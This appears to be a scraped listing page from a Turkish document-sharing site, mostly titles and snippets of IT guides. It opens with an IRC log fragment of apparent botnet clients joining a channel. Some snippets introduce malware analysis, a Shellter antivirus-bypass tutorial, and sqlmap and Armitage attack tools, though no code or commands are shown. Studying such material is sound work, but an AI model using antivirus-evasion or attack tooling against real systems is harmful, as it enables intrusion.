20 [21:50] <********> * [TUR 00 P 83786] (XP-8494@ ) Quit (Connection reset by peer) [21:50] <********> * [RUS 00 D 43169] (XP-2471@ ) has joined #xxx [21:50] <********> * [TUR 00 M 81825] (XP-0312@ ) Quit (Connection reset by peer) [21:50] <********> * [TUR 00 P 83485] (XP-5511@ ) Quit (Ping timeout) [21:50] <********> * [TUR ] (XP-0715@ ) Quit (Connection reset by peer) [21:50] <********> * [ESP 00 M 75075] (XP-0172@host telecom.net.ar) has joined #xxx [21:50] <********> * [ESP 00 D 79796] (XP-2271@ ) has joined #xxx [21:50] <********> * [TUR 00 P 91644] (XP-4410@ ) has joined #xxx [21:50] <********> * [TUR 00 MP 4601] (XP-9739@ ) has joined #xxx [21:50] <********> * [TUR 00 MP 4750] (XP-5209@ ) has joined #xxx [21:50] <********> * [MEX 00 P 57920] (XP-6468@ ) has joined #xxx [21:50] <********> * [RUS 00 PD 7924] (XP-9229@ ) Quit (Connection reset by peer) [21:50] <********> * [TUR 00 MP 4750] (XP-5209@ ) Quit (Connection reset by peer) [21:51] <********> her ülke mevcut
IDA Pro ile Remote Linux Debugging
IDA Pro ile Remote Linux Debugging Windows bağımlısı biri olarak benim dünyamda Linux, hep sanal makina içinde çalışmaya mahkum olmuştur. Her ne kadar Ubuntu yu çok seviyor olsamda alışkanlık ve oyunlar
Korsan Yazılımlardaki Tehlike
Korsan Yazılımlardaki Tehlike Nedense korsan yazılım denilince aklıma hemen Kadıköy Yazıcıoğlu İşhanı gelir. Orta okul yıllarında (1996-1998) usanmadan sıkılmadan her haftasonu arkadaşlarla buluşup yeni
Aracın kullanımı oldukça basit. Yapmanız gereken elinizdeki ip adreslerini ip.txt dosyası içine kayıt etmek ve daha sonrasında aracı çalıştırmak.
WHOIS Desc Aracı Kimi zaman elinizde bir kaç tane ip adresi olur. Bu ip adresleri ya sizin sistemlerinizi zorlamışlardır ya da farklı nedenlerden ötürü hangi kuruma ait olduğu bilgisine ihtiyacınız vardır.
<MS> ben sadece bu tür zararlı yazılımları inceliyorum <MS> kendin mi yazdın bu fuckers.jpg içinde yer alan tüm scripti?
Botnet Gerçeği Geçtiğimiz günlerde http://twitter.com/hack4career üzerinden yayınlanan bir kaç zararlı yazılımı (timunun.exe, scan.exe) incelediğimde karşıma yerli malı ddos saldırı özelliğine sahip, irc
2. dönem itibariyle ben de Zararlı Yazılım Analizi 101 dersi vererek bu programa katkıda bulunacağım.
Blog'um 4 Yaşında :) 19 Kasım 2009 tarihinde, Huzeyfe ÖNAL ın ısrarı üzerine (sağolsun) açmış olduğum blogum, bugün itibariyle 4. yılını doldurmuş bulunuyor. 4 yıl boyunca göstermiş olduğunuz ilgi, alaka,
BitTorrent İstemci Kullanımı
BitTorrent İstemci Kullanımı Değerli Müşterimiz, BitTorrent internet üzerinden dosya paylaşım yazılımına ve aynı tekniği kullanan dosya takas sistemine verilen isimdir. Diğer eşten eşe (P2P) paylaşım programlarından
Windows İşletim Sistemi
Windows İşletim Sistemi Bilgisayar (Özellikler) Bilgisayarınızın özelliklerini görüntülemek için : Masaüstünde Bilgisayar simgesine sağ tıklayarak Özellikler e tıklayın. Çıkan pencerede bilgisayarınızda
Google Chrome Kullanıyorsanız; Microsoft Internet Explorer Kullanıyorsanız;
Öncelikle şöyle kısaca değinelim Proxy (Vekil sunucu) Nedir? Zaman zaman yetkili sunucu veya proxy olarak da anılan Vekil sunucu, internete erişim sırasında kullanılan bir ara sunucudur. Bu durumda, örneğin
Kullanıcı Dostluğu vs Kullanıcı Güvenliği
Kullanıcı Dostluğu vs Kullanıcı Güvenliği Hemen hemen her bilişim güvenliği uzmanı (janjanlı adıyla siber güvenlik uzmanı) çalışma hayatı boyunca ilettiği güvenlik gereksinimleri, aksiyonlar nedeniyle
MEB E-Posta Hizmetleri ve Outlook Programı
MEB E-Posta Hizmetleri ve Outlook Programı İçindekiler Bakanlık E-Posta Hizmetleri ve Sistem Ara yüzü E-posta Hizmetlerinin Outlook Programına Bağlanması Outlook 2010 Kullanımına ilişkin temel bilgiler
RPMNET WOLVOX REPORTER
RPMNET WOLVOX REPORTER TANITIM : EFAR YAZILIM LTD.STI Tarafından Geliştirilen EFAR Wolvox Reporter AKINSOFT Wolvox Kullanıcılarının Android İşletim Sistemi Yüklü Cep Telefonlarından Online Olarak Kullandıkları
Flash dosyası, kaynak koduna çevrilip incelendikten sonra Flash dosyasının kullanıcıyı sayfasına yönlendirdiği,
Jeton Hırsızları Son aylarda Türk kullanıcılarını hedef alan, Chrome ve Firefox için geliştirilmiş olan zararlı eklentilerin sayısında büyük bir artış olduğu eminim sizlerin de dikkatinden kaçmamıştır.
Çalınan Laptopuzunun Peşini Bırakmayın!..
On5yirmi5.com Çalınan Laptopuzunun Peşini Bırakmayın!.. Laptop'unuz mu çalındı? İşte onu izlemenin ve hırsız bezdirmenin en pratik yolu... Yayın Tarihi : 21 Aralık 2011 Çarşamba (oluşturma : 10/2/2015)
(Bilgisayar ağlarının birbirine bağlanarak büyük bir ağ oluşturmasıdır)
İnternet ve WWW İnternet Dünyadaki en büyük bilgisayar ağı, (Bilgisayar ağlarının birbirine bağlanarak büyük bir ağ oluşturmasıdır) İnternet teki web site sayısının yüksek bir hızla artması ve beraberinde
Bir Bilgisayar Bağlanıyor Diğeri Bağlanmıyor
Bir Bilgisayar Bağlanıyor Diğeri Bağlanmıyor Değerli Müşterimiz, Ağınızda bir bilgisayarda internet bağlantısı mevcut, diğerinde mevcut değilse bazı ayarları kontrol etmeniz gerekebilir. Kontrol etmeniz
CELAL BAYAR ÜNİVERSİTESİ KÜTÜPHANE VERİTABANLARINA ÜNİVERSİTE DIŞINDAN ERİŞİM
Celal Bayar Üniversitesi kütüphane veritabanlarına üniversite dışından erişebilmek için kullandığınız internet tarayıcısına uygun olarak bazı ayarlar yapmanız gerekmektedir. Aşağıda tanımlanan ayarlar
Örnek bir kullanım ve bilgisayar ağlarını oluşturan bileşenlerin özeti
Bu sayfaları okuduğunuza göre bir şekilde bilgisayarlar ve bilgisayar ağlarıyla ilişkiniz olduğunu biliyorum. Ancak yine de en başta niçin bilgisayar ağı kullanıyoruz sorusunun cevabını vermekle işe başlayabiliriz.
Penetrasyon Testi (Pentest) Nedir, Ne Değildir? Kurumlar için Neden Önemlidir? Neden Kurumlar Pentester Arıyorlar? İyi Bir Pentester Nasıl Olunur? Sonuç http://www.mertsarica.com http://twitter.com/mertsarica
KURUM AĞLARINI ÖNEMLĠ ZARARLI YAZILIM SALDIRILARINDAN KORUMA. Osman PAMUK
KURUM AĞLARINI ÖNEMLĠ ZARARLI YAZILIM SALDIRILARINDAN KORUMA Osman PAMUK Ġçerik Giriş Örnek Zararlı Yazılımlar Conficker Stuxnet Önemli zararlı yazılım sızma noktaları ve korunma yöntemleri Taşınabilir
IP NİZİ NASI GİZLERSİNİZ?
IP NİZİ NASI GİZLERSİNİZ? İnternette herhangi bir maile kullanıcısına bir foruma yada mail grubuna Amannnn.Beni nerden bulacaklar???? deyip kahrolsun falanca gibi tehlikeli şeyler yazdınız. Birkaç saat
erişmeniz bu uyarılarla karşılaştıktan sonra sunucuya/koda erişimin yasaklanması/kaldırılması nedeniyle pek mümkün olamayabiliyor.
VirusTotal Proxy Art niyetli kişilerin istismar kitleri sayesinde yaması eksik olan (java, flash, pdf, internet tarayıcısı vs.) sistemleri kontrol altına aldıklarına ve bu sistemlere uzaktan yönetime imkan
İNTERNET EXPLORER AYARLARI 1. Başlat-Ayarlar-Denetim Masası menüsünden "İnternet Özellikleri" (Seçenekleri)'ni seçiniz. Resim. 1
A.K.Ü VERİTABANLARINA UZAKTAN ERİŞİM AYARLARI Araştırmacılar, kampüs dışından erişim için kullanıcı adı ve parola doğrulaması ile Üniversitemiz sistemi üzerinden Kütüphane veri tabanlarını kullanabilmektedir.
http://www.mertsarica.com http://twitter.com/mertsarica [email protected]
[email protected] Neden zararlı yazılım analizi? Klasik zararlı yazılım analizi Ofansif zararlı yazılım analizi Araçlar üzerine Sonuç http://www.mertsarica.com http://twitter.com/mertsarica Mesai saatlerinde...
Bilgisayar Yazılımları
Bilgisayar Yazılımları Yazılım Türleri Programlama Dilleri Bir işi bilgisayara yaptırmak ancak belirli kodların belirli bir sıra doğrultusunda kullanılması ile olanaklıdır. Kullanılan bu koda programlama
Siber Suçlarla Mücadele Şube Müdürlüğümüz, ilimiz Derince ilçesinde bulunan İl Emniyet Müdürlüğü yerleşkesinde faaliyet göstermektedir.
Siber Suçlarla Mücadele Şube Müdürlüğümüz, ilimiz Derince ilçesinde bulunan İl Emniyet Müdürlüğü yerleşkesinde faaliyet göstermektedir. Telefon & Faks : 0(262) 229 0706 e-posta:[email protected] [email protected]
Virtualization. VMware vcenter Server Yapılandırılması
Virtualization VMware vcenter Server Yapılandırılması VMware vcenter Server sanallaştırılmış datacenter, kurumsal sunucular gibi yapıların yönetilmesini sağlayan ve maliyetleri aşağılara çeken bir yönetim
KÖTÜ AMAÇLı YAZıLıMLAR VE GÜVENLIK
KÖTÜ AMAÇLı YAZıLıMLAR VE GÜVENLIK GIRIŞ Kötü amaçlı programlar bilgisayar kullanıcılarını en çok tedirgin eden günlük sorunların başında geliyor. Bu tür yazılımlar genellikle kullanıcının bilgisi olmadan
http://www.mertsarica.com http://twitter.com/mertsarica
Android üzerine Penetrasyon testi üzerine Penetrasyon testi adımları Örnek Zafiyetler Sonuç http://www.mertsarica.com http://twitter.com/mertsarica Ahlaklı Korsan Blog Yazarı Python Programcısı Zararlı
KÜTÜPHANE KAYNAKLARINA DIŞARIDAN (PROXY SUNUCU KULLANARAK) BAĞLANMAK İÇİN YAPILMASI GEREKENLER A. INTERNET EXPLORER KULLANICILARI İÇİN;
KÜTÜPHANE KAYNAKLARINA DIŞARIDAN (PROXY SUNUCU KULLANARAK) BAĞLANMAK İÇİN YAPILMASI GEREKENLER A. INTERNET EXPLORER KULLANICILARI İÇİN; 1. İnternet Explorer açılır. ARAÇLAR > İNTERNET SEÇENEKLERİ iletişim
Trickbot Zararlı Yazılımı İnceleme Raporu
Trickbot ı İnceleme Raporu trickbot.exe isimli Trojan yazılımı son yıllarda sürekli geliştirilen ve yeni yetenekleri ile karşımıza çıkan bir zararlı yazılımdır. Zararlı olarak çalışma yöntemi Trojan olması
TÜRKİYE CUMHURİYETİ ORMAN GENEL MÜDÜRLÜĞÜ DASDIFFUSION DEPARTMENTAL EDITION 1. FAZ TARAMA PC KURULUM KILAVUZU
TÜRKİYE CUMHURİYETİ ORMAN GENEL MÜDÜRLÜĞÜ DASDIFFUSION DEPARTMENTAL EDITION 1. FAZ TARAMA PC KURULUM KILAVUZU Hazırlayan: DAS A.Ş. 1 S a y f a D A S R & D Amaç ve Kapsam Bu doküman ile, Türkiye Cumhuriyeti
Twitter da bu durumla karşılaşan başka kullanıcılar var mı diye twitter virüs anahtar kelimeleri ile genel bir arama yaptığımda ise bu durumun Nisan
Sosyal Ağ Hırsızları Bundan üç yıl önce yine Haziran ayında yayımlamış olduğum Jeton Hırsızları başlıklı blog yazımda, art niyetli kişilerin zararlı Chrome ve Firefox eklentiler ile kullanıcıların Facebook
NİTELİKLİ ELEKTRONİK SERTİFİKA KURULUM AŞAMALARI
NİTELİKLİ ELEKTRONİK SERTİFİKA KURULUM AŞAMALARI Kurulum Aşamaları: 1. Java Kurulumu 2. E-imza Sürücülerinin İndirilmesi 3. Kart Okuyucu Kurulumu 4. Akıllı Kart Kurulumu 5. Sertifikayı Kullanıma Açma Bilgisayarların
http://www.mertsarica.com http://twitter.com/mertsarica
Donanım yazılımı (firmware) nedir? Neden analiz edilmelidir? Analiz yöntemleri ve araçları Örnek analizler Sonuç Mesai saatlerinde Mesai saatlerinde ve boş zamanlarımda Bahçeşehir Üniversitesi Siber Güvenlik
Bilgisayar Ağları ve Ağ Güvenliği DR. ÖĞR. ÜYESİ KENAN GENÇOL HİTİT ÜNİVERSİTESİ ELEKTRİK-ELEKTRONİK MÜH.
Bilgisayar Ağları ve Ağ Güvenliği DR. ÖĞR. ÜYESİ KENAN GENÇOL HİTİT ÜNİVERSİTESİ ELEKTRİK-ELEKTRONİK MÜH. TCP/IP (Transmission Control Protocol/Internet Protocol) Bilgisayarlar arasında veri haberleşmesini
Sqlmap pyhton dili yazılarak geliştirilmiş Sql injection için testerlara son derece yardımcı olan bir araçtır.
SqlMap Kullanımı Sqlmap pyhton dili yazılarak geliştirilmiş Sql injection için testerlara son derece yardımcı olan bir araçtır. Temel olarak yaptığı işlem sizin belirtmiş olduğunuz parametrelere göre hedef
ELEKTRONİK BELGE YÖNETİM SİSTEMİ KOORDİNATÖRLÜĞÜ (EBYS KOORDİNATÖRLÜĞÜ) ELEKTRONİK İMZA KURULUM AŞAMALARI VE EBYS PROGRAMI SİSTEM GEREKSİNİMLERİ
ELEKTRONİK BELGE YÖNETİM SİSTEMİ KOORDİNATÖRLÜĞÜ (EBYS KOORDİNATÖRLÜĞÜ) ELEKTRONİK İMZA KURULUM AŞAMALARI VE EBYS PROGRAMI SİSTEM GEREKSİNİMLERİ E-İMZA KURULUM AŞAMALARI Birimimizden almış olduğunuz e-imzanızı
(... GÜÇLÜ KORUMA, DÜŞÜK SİSTEM KAYNAĞI KULLANIMI...)
(... GÜÇLÜ KORUMA, DÜŞÜK SİSTEM KAYNAĞI KULLANIMI...) Programın Özellikleri; En son online tehditlere karşı korunun Endişelenmeden e-posta alıp gönderin, sohbet edin ve web'de gezinin - Norton İtibar Hizmeti:
V14xx Güncelleme İşlemleri
V14xx Güncelleme İşlemleri İnternet tarayıcınızdan www.mikro.com.tr web adresine giriş yapınız. Mikro web sayfasında arşivleri (exe) indirmek için MİKROCRM ikonunu mouse ise seçiniz. Açılan sayfada Kullanıcı
1. PROGRAM KURMA 1.1 LİNUX PROGRAMLARINI KURMA. 1.1.1 Yazılım Merkezi ile Program Kurma
1. PROGRAM KURMA 1.1 LİNUX PROGRAMLARINI KURMA 1.1.1 Yazılım Merkezi ile Program Kurma Ubuntu işletim sisteminde en kolay program kurma yöntemidir. Birlikte Ubuntu Yazılım Merkezini tanımaya çalışalım.
Malware Analizi Yöntem ve Araçları. Huzeyfe ÖNAL [email protected] Bilgi Güvenliği AKADEMİSİ Twitter: @bgakademisi @huzeyfeonal
Malware Analizi Yöntem ve Araçları Huzeyfe ÖNAL [email protected] Bilgi Güvenliği AKADEMİSİ Twitter: @bgakademisi @huzeyfeonal Huzeyfe ÖNAL Bilgi Güvenliği AKADEMİSİ Eğitmen, Pentester, Danışman,
İZMİR EKONOMİ ÜNİVERSİTESİ KÜTÜPHANE VERİTABANINA KAMPÜS DIŞINDA ERİŞİM
İZMİR EKONOMİ ÜNİVERSİTESİ KÜTÜPHANE VERİTABANINA KAMPÜS DIŞINDA ERİŞİM İzmir Ekonomi Üniversitesi Kütüphane veritabanlarına kampüs dışından erişebilmek için kullandığınız tarayıcıya uygun olarak bazı
Anti-Virüs Atlatma 3. Kurulum
Anti-Virüs Atlatma 3 Anti-virüs bypass yazı dizisinin başka bir bölümü olan Shellter aracını anlatan yazı ile devam edeceğiz. Shellter, ücretsiz ve multi platform çalışabilen bir anti-virus bypass aracıdır.
LOGO TIGER WINGS KURULUMU VE AYARLARI
Bölüm LOGO TIGER WINGS KURULUMU VE AYARLARI Tiger Wings rol bazlı kişiselleştirilebilir masaüstü, ürün içi arama motoru gibi özellikler ile birlikte appin-app teknolojisini, estetik yepyeni bir tasarım
Kaynak Kodlardan Derleme. Turquaz Muhasebe. Versiyon 0.2. Hüseyin Ergün. 26 Mart 2005
Kaynak Kodlardan Derleme Turquaz Muhasebe Versiyon 0.2 Hüseyin Ergün 26 Mart 2005 Turquaz Muhasebe, Kaynak Kodları Derleme Sayfa 2 İçindekiler İÇİNDEKİLER 2 GEÇMİŞ DEĞİŞİKLİKLER 3 1. GİRİŞ 4 1.1 AÇIKLAMA
MİLLİ EĞİTİM BAKANLIĞI YENİ EPOSTA SİSTEMİ HAKKINDA MEB
İçindekiler MİLLİ EĞİTİM BAKANLIĞI YENİ EPOSTA SİSTEMİ HAKKINDA... 3 MEB Yeni E-posta Sistemi Kullanım Detayları;... 4 MEBBİS ile Giriş... 5 E-posta Şifresi İle Giriş... 6 Şifre Hatırlatma Ekranında Karşılaşılan
U y g u l a m a A i l e s i (Abakus 360, T-Panel, T-CRM) Tarayıcı Ayarları. IPera İletişim Teknolojileri
U y g u l a m a A i l e s i (Abakus 360, T-Panel, T-CRM) Tarayıcı Ayarları Başlarken İletişim yönetimi için gerekli tüm araçları sunan OfisTelefonu 07 programları Abakus 360, T-Panel ve T-CRM, bir kuruluştaki
TALİMAT. Doküman No: PT Yayın Tarihi: Revizyon Tarihi: -- Revizyon No: -- Sayfa 1 / 6
Sayfa 1 / 6 Doküman Yönetim Yazılımlarına erişilebilmesi için aşağıda belirtilmiş olan sıralama ile işlemlerin gerçekleştirilmesi gerekmektedir. Aksi durumda yazılıma erişim, kullanılan programlar tarafından
e-imzatr Kurulum Klavuzu
e-imzatr Kurulum Klavuzu Sürüm 0.0.1 1 İçindekiler İşletim Sistemi Sistem Türü Öğrenme Java yükleme Akis Kurulum Kart Okuyucu Sürücü Kurulum Kullanıcı Doğrulama 2 İşletim Sistemi Sistem Türü Öğrenme Bu
DYNED İLE İLGİLİ SIRASIYLA HANGİ İŞLEMLER YAPACAĞIZ
DYNED İLE İLGİLİ SIRASIYLA HANGİ İŞLEMLER YAPACAĞIZ 1. Bilgisayarımızda İnternet Explorer yani tarayıcı penceresini açtığımızda; ilk yapacağımız şey Tüm Resmi Okullar ve İlçe ve İl Milli Eğitim Müdürlükleri
FTP Programı File Zilla nın Kurulumu & Çalıştırılması
FTP Programı File Zilla nın Kurulumu & Çalıştırılması FileZilla Portable programının web den indirilmesi : Google veya benzeri bir arama motoru kullanarak FileZilla FTP programının portatif sürümünü internetten
Kurumsal Güvenlik ve Web Filtreleme
S a y f a 1 antikor Kurumsal Güvenlik ve Web Filtreleme SshClient, Putty v.s. S a y f a 2 S a y f a 3 Yönetici olarak AntiKor a girmek için SshClient veya Putty programı kullanılır. IP olarak kurum içinden
Windows 10 için Java JDK 8 ve NetBeans IDE 8.2 Kurulumu Detaylı Anlatım
Windows 10 için Java JDK 8 ve NetBeans IDE 8.2 Kurulumu Detaylı Anlatım Merhaba arkadaşlar bu yazımızda sizlere windows 10 platforumunda java development kit (java geliştirme kiti) Java JDK nın kurulumundan
Asiston Hizmetleri Bilgilendirme Kitapçığı
Asiston Hizmetleri Bilgilendirme Kitapçığı asiston.com.tr 7/24 Bilgisayarcınıza nasıl ulaşırsınız? Telefon ile ara Bizi telefonla arayabilir, 0850 532 0 100 7/24 Bilgisayarcım hattında 1 i Tuşlayarak destek
Proticaret Exclusive Versiyon Yükseltme Dokümanı(v.3.0'dan v3.1.0'a)
Proticaret Exclusive Versiyon Yükseltme Dokümanı(v.3.0'dan v3.1.0'a) Bu belge, Webmaster düzeyindeki kullanıcıların kurulu olan Proticaret Exclusive portalının versiyon v3.0'dan versiyon 3.1.0'a yükseltirken
Kurumsal Güvenlik ve Web Filtreleme
S a y f a 1 antikor Kurumsal Güvenlik ve Web Filtreleme SshClient, Putty v.s. S a y f a 2 S a y f a 3 S a y f a 4 S a y f a 5 S a y f a 6 S a y f a 7 şeklini alır. Bu durumda kullanıcı yasaklı konumdadır.
Pandora'nın Kutusu Nasıl Açılır?
Pandora'nın Kutusu Nasıl Açılır? Zararlı yazılım analistini nedense meraklı Pandora ya benzetirim çünkü işi gereği kötülük ile dolu olan o kutuyu (paketlenmiş zararlı yazılım) açarak kötülüğün tüm işletim
Elektronik Belge Yönetim Sistemi Kullanım Kılavuzu
Elektronik Belge Yönetim Sistemi Kullanım Kılavuzu İçindekiler E-İmza PIN Kodunun Alınması...2 Windows İşletim Sisteminde Yapılması Gereken işlemler...8 Windows XP ve 7 için Sürücü Kurulumu...8 Microsoft.NET
C için tümleşik geliştirme ortamı (IDE) kurulumları
C için tümleşik geliştirme ortamı (IDE) kurulumları 1. Code::Blocks IDE 2. Eclipse IDE 3. Dev-C++ IDE 4. Code::Blocks EDU-Portable (CodeBlocks-EP) IDE ( IDE: Integrated Development Environment http://tr.wikipedia.org/wiki/t%c3%bcmle%c5%9fik_geli%c5%9ftirme_ortam%c4%b1
Proticaret Exclusive Versiyon Yükseltme Dokümanı(v.3.2.0'dan v3.2.1'e)
Proticaret Exclusive Versiyon Yükseltme Dokümanı(v.3.2.0'dan v3.2.1'e) Bu belge, Webmaster düzeyindeki kullanıcıların kurulu olan Proticaret Exclusive portalının versiyon v3.2.0'dan versiyon 3.2.1'e yükseltirken
Wolvox Kapı Ekranı. AKINSOFT Wolvox Kapı Ekranı Yardım Dosyası. Doküman Versiyon : 1.02.01
AKINSOFT Yardım Dosyası Doküman Versiyon : 1.02.01 Tarih : 15.11.2014 1 1. KULLANIM AMACI Personel takip sistemi kullanmak isteyen tüm işletmeler için geliştirilmiştir. WOLVOX İnsan Kaynakları programı
Bu makalede 2003 sunucu, Windows 2003 Server anlamına gelmektedir. Aşağıda yapılan işlemler 2003 R2 sunucu üzerinde denenmiş ve çalıştırılmıştır.
WINDOWS 2003 SUNUCULARI ÜZERĐNE PHP YÜKLENMESĐ ERDAL YAZICIOĞLU erdal(at)gmail.com http://barbarossa41.wordpress.com Merhabalar, Çözümpark.com adresinde bir kullanıcı ASP ve PHP yi aynı sunucu üzerinde
Armitage Nedir? Kullanım Öncesi
Armitage Nedir? Armitage, metasploit veritabanını kullanan grafiksel bir test / saldırı araçlarından bir tanesidir. Armitage metasploit veritabanlarını kullanması nedeniyle hedef sistemin bilgilerine göre
WEB SUNUCU GÜVENLİĞİ: Web Siteleri Neden Hacklenir?
WEB SUNUCU GÜVENLİĞİ: Web Siteleri Neden Hacklenir? Gereksiz yedek dosyaları Default ayarlarla gelen konfigürasyon dosyaları Yetkisi tam olarak verilmiş dosyalar ya da dosya izni kontrolü yapılmadan sunucuda
Öğrenciler için Kablosuz İnternet Erişimi (Wi-Fi) Kullanım Kılavuzu
T.C. KIRŞEHİR AHİ EVRAN ÜNİVERSİTESİ REKTÖRLÜĞÜ Bilgi İşlem Daire Başkanlığı Bilgi İşlem Daire Başkanlığı [email protected] Sayfa 1 / 9 KABLOSUZ AĞ TEKNOLOJİLERİ Öğrencilerimizin taşınabilir cihazlarından
İZMİR EKONOMİ ÜNİVERSİTESİ KÜTÜPHANE VERİTABANINA KAMPÜS DIŞINDA ERİŞİM
İZMİR EKONOMİ ÜNİVERSİTESİ KÜTÜPHANE VERİTABANINA KAMPÜS DIŞINDA ERİŞİM İzmir Ekonomi Üniversitesi Kütüphane veritabanlarına kampüs dışından erişebilmek için kullandığınız tarayıcıya uygun olarak bazı
VIRTUALIZATION SANALLAŞTIRMA
VIRTUALIZATION SANALLAŞTIRMA EĞİTMEN AD SOYAD : FAHRETTİN ERDİNÇ TECRÜBE : 17 YIL OKUL : 1995 DEÜ ELK-ELKTR MÜH. BİLİMSEL AKADEMİ KİMDİR? BİLİMSEL AKADEMİ, 1996 YILINDAN BERİ EĞİTİM KONUSUNDA FAALİYET
ŞEHİT FEHMİ BEY ORTAOKULU
ŞEHİT FEHMİ BEY ORTAOKULU BİLİŞİM TEKNOLOJİLERİ 1 VE YAZILIM 2 3 İÇİNDEKİLER Bilgisayar virüsü nedir? Virüslerin zararı nelerdir? Virüsler bilgisayara nasıl bulaşır? Bilgisayarda virüs olduğu nasıl anlaşılır?
Bilişim Teknolojileri
Bilişim Teknolojileri Dünyada İnternet Kullanımı 2 milyardan fazla kişi internet kullanıyor. 1 milyardan fazla kişi sosyal ağ sitelerine üye. 5 milyardan fazla cep telefonu kullanıcısı var. Türkiye de
ÇANKRI KARATEKİN ÜNİVERSİTESİ
ÇANKRI KARATEKİN ÜNİVERSİTESİ BİLGİ İŞLEM DAİRE BAŞKANLIĞI KABLOSUZ EDUROAM AYARLARI MS WINDOWS 7 İŞLETİM SİSTEMİ AYARLARI 1 (VARSA) MEVCUT EDUROAM PROFİLİNİN SİLİNMESİ Eğer daha önce EDUROAM ağına bağlanmayı
Android Uygulamalarında Güvenlik Testi
Android Uygulamalarında Güvenlik Testi Şubat ayında Gartner tarafından yayımlanan bir rapora göre dünya genelinde 2011 yılının 4. çeyreğinde satılan akıllı telefonların %50.9 unda Android işletim sisteminin,
Temel Bilgisayar Uygulamaları Web Tasarımı, Programlama Dilleri ve C# a Giriş
Kitap: Örneklerle Algoritma ve C# Programlama - Erhan Arı C# Giriş C# yazmak için Windows ta Visual Studio, Mac te Xamarin Studio kullanırız. Bi C# Projesi oluşturmak için Visual Studio da: File(Dosya)->New
SÜRE BAŞLAMA TARİHİ : 19/12/2018 BİTİŞ TARİHİ : 20/02/2019 KURS SÜRESİ : 144 Saat KURS NO :
2018-2019 Eğitim-Öğretim Yılı Konya / Hüyük Hüyük Halk Eğitimi Merkezi Müdürlüğü Bilişim Teknolojileri Alanı Siber Tehdit İstihbaratı (Cyber Threat Intelligence) Kurs Planı SÜRE BAŞLAMA TARİHİ : 19/12/2018
Kaspersky Open Space Security: Release 2. İşletmeniz için birinci sınıf bir BT güvenliği çözümü
Kaspersky Open Space Security: Release 2 İşletmeniz için birinci sınıf bir BT güvenliği çözümü Güncellenmiş uygulamalar Updated applications Release 2 uygulamaları: Kaspersky Anti-virus for Windows Workstations
BEUN VPN Hizmeti. VPN Nedir?
BEUN VPN Hizmeti VPN Nedir? VPN, Virtual Private Network, yani Sanal Özel Ağ ın kısaltılmasıdır. VPN, İnternet gibi halka açık telekomünikasyon altyapılarını kullanarak kullanıcılar veya uzak ofisleri
Trend Micro Worry-Free Business Security 8.0 İlk Kez Kurulumla İlgili İpuçları ve Püf Noktaları
Trend Micro Worry-Free Business Security 8.0 İlk Kez Kurulumla İlgili İpuçları ve Püf Noktaları Casus Yazılımdan İstenmeyen E- Koruma Postadan Koruma Virüsten Koruma Kimlik Avından Koruma İçerik ve URL
AirTies Kablosuz Erişim Noktası (Access Point) olarak kullanacağınız cihazı bilgisayarınıza bağlayarak ayarlarını yapabilirsiniz.
VLAN Yapılandırma Değerli Müşterimiz, VLAN özelliği ile yerel ağınızı segmentlere ayırarak bölebilir ve aynı ağ geçidini kullanarak internete çıkabilen bu segmentlerin birbirlerine erişimlerini engelleyebilirsiniz.
Linux Temelli Zararlı Yazılımların Bulaşma Teknikleri, Engellenmesi ve Temizlenmesi
Linux Temelli Zararlı Yazılımların Bulaşma Teknikleri, Engellenmesi ve Temizlenmesi Zararlı Yazılım Analiz ve Mücadele Merkezi TÜBİTAK BİLGEM Siber Güvenlik Enstitüsü Sunum İçeriği Zararlı Yazılım Bulaşma
Turquaz Windows kurulum dökümanı. ftp://ftp.mirror.ac.uk/sites/ftp.postgresql.org/binary/v7.3.1/windows/pgsql731wina1.exe
1. Giriş Turquaz programını windows üzerinde çalıştırmak için öncelikle bilgisayarınızda postgresql ve Java nın kurulu olması gerekli. Aşağıdaki bilgi ve dökümanlar windows 2000 işletim sistemi üzerinde
ORSOFT 5.22 AMERİKAN KÜLTÜR DERNEĞİ DİL OKULLARI YÖNETİM BİLGİ SİSTEMİ KURULUMU
ORSOFT 5.22 AMERİKAN KÜLTÜR DERNEĞİ DİL OKULLARI YÖNETİM BİLGİ SİSTEMİ KURULUMU UDİSA Bilgisayar Limited Şirketi tarafından yazımı tamamlanan ve sizler için özel olarak geliştirilen bilgisayar programımızın,
Windows Live ID ve parolanızı giriniz.
Ücretsiz Deneme Hesabı Oluşturma ve Temel Özelliklerin Kullanım Kılavuzu Bilgi girilmesi gerekli alanlar Kişisel bilgi içeren alanlar http://www.windowsazure.com/tr-tr/pricing/free-trial/ adresine gidiniz
CLIENT MAKİNELERE IBM SPSS Statistics 21 nin KURULMASI
CLIENT MAKİNELERE IBM SPSS Statistics 21 nin KURULMASI License manager ile lisanslamanın tamamlandığına emin olunduktan sonra son kullanıcıların makinalarına IBM SPSS Statistics 21 client kurulumu yapılabilir.
Foobar2000. Bu yazının hiçbir hakkı mahfuz değildir. Istediğiniz gibi kulanabilirsiniz. Foobar2000 - Mart 2008 1
Foobar2000 Bu yazının hiçbir hakkı mahfuz değildir. Istediğiniz gibi kulanabilirsiniz. Foobar2000 - Mart 2008 1 CD'lerimizi diskimize attıktan sonra sıra geldi onları DAC'ımızın anlayacağı lisana çeviren
Çerezleri (Cookie) ve Önbelleği (Cache) Temizleme
Çerezleri (Cookie) ve Önbelleği (Cache) Temizleme Kullandığınız tarayıcıda veya görüntülediğiniz sayfada sorun varsa, öncelikle tarayıcının önbelleğini temizlemeyi deneyin. Önbelleği temizledikten sonra
KURULUM DÖKÜMANI ERP/ON ÜRÜNÜ İLK KURULUM DÖKÜMANI
SAYFA NO 1 / 12 DOKÜMAN NO 01-001 NO REV.000 YAYIN 2012 1.Ürün Çevre Şartları ve Kurulum İçeriği Setup / Kurulum Programı Lisans Sistemi Database Yükleme Logları Ürün Yükleme Ve Lisans Servisi Setup- Minimum
SQL Uyarı Programı Kurulum ve Kullanımı
SQL Uyarı Programı Kurulum ve Kullanımı Kurulum 1. SQL Uyarı.zip dosyası açılır. 2. SQL Uyarı.exe programı çalıştırılır. 3. Üstteki ekran açılır ok. Butonuna basılır. 4. Ayarlar ekranı seçilir. 4.1 Server
SAÜ BİLGİSAYAR VE BİLİŞİM BİLİMLERİ FAKÜLTESİ ORTAK BİLGİSAYAR DERSLERİ KOORDİNATÖRLÜĞÜ HAFTA 1 İÇERİĞİNE AİT UYGULAMA FÖYÜ
